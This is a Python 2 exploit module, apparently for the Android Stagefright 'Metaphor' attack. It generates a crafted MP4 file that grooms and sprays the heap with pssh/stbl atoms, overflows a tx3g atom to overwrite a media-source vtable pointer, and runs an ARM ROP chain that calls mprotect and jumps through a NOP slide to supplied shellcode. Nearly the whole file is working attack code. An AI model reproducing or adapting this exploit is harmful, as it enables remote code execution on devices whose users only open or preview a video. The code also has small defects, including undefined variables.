﻿#!/usr/bin/python2
# -*- coding: utf-8 -*-

from metaphor_tools import *
from metaphor_base import *

# TODO: Implement egg hunter

TX3G_HEADER_SIZE = 8
DUMMY_HEADER_SIZE = 8

class MetaphorRceStbl(MetaphorBase):
    DEFAULT_CONFIG = \
    {
        # ROP configuration
        # TODO: Use or delete...
        'rop_stack_offset': 0x500,
        'shellcode_offset': PAGE_SIZE,
        'stack_pivot_padding': 0x4c,
        'module_name': 'libc.so',
        'readAt_offset': 0x1c,

        # Heap shaping configuration
        'fill_size': 0x20,
        'groom_count': 0x50,
        'spray_size': 0x81 * PAGE_SIZE,
        'spray_count': 0x20,

        # addresses that we need to predict
        #'module_base': 0xb6f73000,
        'spray_address': 0xb2001000,
        #'spray_pad': 0x1000, #0x5000, # + 0x3000,

        # Shellcode configuration
        'shellcode_thumb': False
    }

    def __init__(self, config, gadgets, shellcode, param1, param2, param3):
        self.config = config
        self.gadgets = gadgets
        self.shellcode = shellcode
        self.param1, self.param2, self.param3 = param1, param2, param3

    def get_payload(self, size):
        config = self.config
        gadgets = self.gadgets
        
        if config['rop_stack_offset'] >= config['shellcode_offset']:
            raise Exception('Memory layout requires stack data to come before shellcode')
            
        if config['shellcode_offset'] + len(self.shellcode) >= size:
            if len(shellcode) < size:
                raise Exception('Shellcode is too large to be placed at this position')
            else:
                raise Exception('Shellcode is too large')

        shellcode_address = config['spray_address'] + config['shellcode_offset'] + 16
        if config['shellcode_thumb']:
            shellcode_address |= 1

        # Pass mmap aligned address
        spray_page_addess = (config['spray_address'] // PAGE_SIZE) * PAGE_SIZE
        spray_page_size = (size // PAGE_SIZE) * PAGE_SIZE
       
        pivot = p32(gadgets['stack_pivot'])
        pivot *= config['readAt_offset'] // 4 + 1

        #rop_slide = p32(gadgets['pop_pc'])
        #rop_slide *= 0x40

        payload = ''
                                                            # ///////////////////////////////////
                                                            # // Fake virtual table - in bold  //
                                                            # // followed by fake stack and    //
                                                            # // then nop-slide to shellcode   //
                                                            # ///////////////////////////////////
                                                            # ╔═════════════════════════════════╗
        payload += pivot                                    # ║ stack pivot                     ║
                                                            # ╟═−═−═−═−═−═−═−═−═-═−═−═−═−═−═−═−═╢
        payload += p32(gadgets['pop_r0_r1_r2_pc'])          # │ pop {r0, r1, r2, pc}            │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(spray_page_addess)                   # │ r0 = shellcode address aligned  │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(spray_page_size)                     # │ r1 = size                       │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(PROT_RWX)                            # │ r2 = protection                 │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(gadgets['mprotect'])                 # │ pc = mprotect                   │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(gadgets['pop_r0_r1_r2_pc'])          # │ pop {r0, r1, r2, pc}            │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(self.param1)                         # │ r0 = param1                     │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(self.param2)                         # │ r1 = param2                     │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(self.param3)                         # │ r2 = param3                     │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += p32(shellcode_address)                   # │ pc = shellcode address          │
        payload_short = payload                             # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        # Generate nop-slide, just in case...               # │ nop-slide                       │
        nop = p32(0xbf00bf00)                               # │ ...                             │
        while len(payload) < config['shellcode_offset']:    # │ ...                             │
            payload += nop                                  # │ nop-slide                       │
                                                            # ├−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┤
        payload += self.shellcode                           # │ shellcode                       │
                                                            # └−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−┘
        if len(payload) > size:
            print 'Warning: shellcode size is bigger than %u bytes' % (block_size - (len(payload) - len(self.shellcode)))
            
        #print 'ROP + Slide + Shellcode: %u bytes' % len(payload)
        pad_len = size - len(payload)
        #payload += pad(pad_len)

        print 'Payload - pssh: %u kB (0x%x)' % (len(payload) // 1024, len(payload))
        #print 'Payload - dummy: %u kB (0x%x)' % (len(dummy) // 1024, len(dummy))
        #payload = dummy + alloc_pssh_data(payload)
        #print 'Payload - dummy + pssh: %u kB (0x%x)' % (len(payload) // 1024, len(payload))
        
        return payload
    
    def heap_spray(self, size):
        print 'Desired size: %u kB (0x%x)' % (size // 1024, size)
        offset = self.config['rop_stack_offset']
        payload = self.get_payload(size) # - PSSH_HEADER_SIZE - STBL_HEADER_SIZE)
        
        dummy = alloc_dummy(payload)

        count_copies = size // len(payload) - 1

        if count_copies < 1:
            raise Exception('Desired size is too small!')

        payload *= count_copies
        if len(payload) < size:
            payload += pad(size - len(payload))

        pssh = alloc_pssh_data(pad(STBL_HEADER_SIZE + DUMMY_HEADER_SIZE) + payload)
        stbl = alloc_stbl(dummy + pssh)
        spray = stbl * self.config['spray_count']

        return spray

    def exploit_mp4(self):
        config = self.config
        fill_size = self.config['fill_size']
        
        ftyp = valid_ftyp()

        trak = ''

        trak += self.heap_spray(config['spray_size'])

        trak += alloc_titl(fill_size)
        trak += alloc_gnre(fill_size)
        #trak += alloc_perf(fill_size)
        #trak += alloc_auth(fill_size)

        vtable_address = config['spray_address'] + STBL_HEADER_SIZE + DUMMY_HEADER_SIZE
        rop_slide_address = config['spray_address'] + config['readAt_offset'] + STBL_HEADER_SIZE + DUMMY_HEADER_SIZE

        pad_len = config['stack_pivot_padding'] - 4
        overflown_size = config['fill_size'] - TX3G_HEADER_SIZE

        # | tx3g | MPEG4DataSource | pssh |
        overflow = pad(overflown_size)

        # | tx3g ----------------> | pssh |
        overflow += p32(vtable_address)    # MPEG4DataSource vtable ptr

        overflow += '\x00' * pad_len        # padding...
        overflow += '\x00\x00\x00\x00'      # r4
        overflow += '\x00\x00\x00\x00'      # r5
        overflow += '\x00\x00\x00\x00'      # r6
        overflow += '\x00\x00\x00\x00'      # r7
        overflow += '\x00\x00\x00\x00'      # r8
        overflow += '\x00\x00\x00\x00'      # r9
        overflow += '\x00\x00\x00\x00'      # r10
        overflow += '\x00\x00\x00\x00'      # r11
        overflow += '\x00\x00\x00\x00'      # r12
        overflow += p32(rop_slide_address)  # sp
        overflow += p32(self.gadgets['pop_pc'])  # lr

        trak += chunk('tx3g', overflow)

        # | pssh | pssh | pssh | tx3g | MPEG4DataSource | pssh |
        # | pssh | pssh | pssh | tx3g ----------------> | pssh |
        unsafe_length = (-(len(overflow) - overflown_size) & 0xffffffffffffffff)

        # Free placeholder #2
        trak += alloc_titl(fill_size * 4)
        
        # Allocate MPEG4DataSource
        trak += alloc_stbl()
        
        # Free placeholder #1
        trak += alloc_gnre(fill_size * 4)

        trak += chunk('tx3g', '', length = unsafe_length)

        data = ftyp + chunk('trak', trak)

        return data
